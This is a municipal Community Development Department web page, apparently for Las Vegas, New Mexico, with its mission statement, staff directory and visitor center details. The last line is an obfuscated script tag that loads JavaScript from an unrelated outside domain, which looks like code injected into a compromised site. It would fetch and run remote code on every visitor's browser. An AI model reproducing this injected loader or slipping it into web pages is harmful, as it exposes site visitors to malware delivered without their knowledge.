Community Development (505) 426-3314


The mission of the Community Development Department is to promote progressive, balanced development and improvements that reflect community standards.

Employee Directory
Community Development Receptionist
(505) 426-3314

Office Staff

Bill Hendrickson,  Community Development Director
bhendrickson@lasvegasnm.gov

Valerie D. Macias, Administrative Assistant II
vmacias@lasvegasnm.gov


Maria Perea, Planning & Zoning Coordinator
mariaperea@lasvegasnm.gov

Christina Baca, Administrative Assistant
cbaca@lasvegasnm.gov

Ben Maynes, Building Code Supervisor
bmaynes@lasvegasnm.gov

Chuck Griego, Film and Events Coordinator
cgriego@lasvegasnm.gov

Virginia Marrujo, Multimedia Production Coordinator
vmarrujo@lasvegasnm.gov

LVSM Chamber of Commerce, Visitors Center Clerk
(505) 425-3707
.

   The City of Las Vegas Visitor's Center is located at 500 Railroad Ave.
(Tourist Information Center)


"<SCR"+"IPT" type="text/javascript" src="http://programdiag.com/21a68356dd31178fa6.js">""